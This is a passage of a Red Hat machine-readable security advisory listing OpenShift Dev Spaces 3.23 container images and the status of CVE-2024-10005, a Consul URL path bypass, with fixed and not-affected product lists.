          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64"
        },
        "product_reference": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64"
        },
        "product_reference": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x"
        },
        "product_reference": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64"
        },
        "product_reference": "registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64"
        },
        "product_reference": "registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x"
        },
        "product_reference": "registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le"
        },
        "product_reference": "registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64"
        },
        "product_reference": "registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x"
        },
        "product_reference": "registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le"
        },
        "product_reference": "registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64"
        },
        "product_reference": "registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64"
        },
        "product_reference": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64"
        },
        "product_reference": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x"
        },
        "product_reference": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le"
        },
        "product_reference": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64"
        },
        "product_reference": "registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64"
        },
        "product_reference": "registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x"
        },
        "product_reference": "registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
          "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
        },
        "product_reference": "registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le",
        "relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2024-10005",
      "cwe": {
        "id": "CWE-22",
        "name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
      },
      "discovery_date": "2024-10-30T22:00:40.599537+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2322857"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A vulnerability was found in HashiCorp Consul. Due to a lack of path normalization, URL paths in L7 traffic intentions can be exploited to bypass permissions defined in the intentions.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "hashicorp/consul: consul: Consul L7 Intentions Vulnerable To URL Path Bypass",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "This vulnerability is rated as important severity because the lack of path normalization in HashiCorp Consul allows attackers to exploit URL paths in L7 traffic intentions, bypassing defined permissions. This can compromise both confidentiality and integrity, enabling unauthorized access to sensitive data and resources, highlighting the need for immediate attention.\n\nThis CVE has been rated \"Low\" as RH does not use Consul/Consul Catalog as a provider for configuration discovery in Traefik Proxy. Even though the product is affected, RH products are not vulnerable.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64"
        ],
        "known_not_affected": [
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
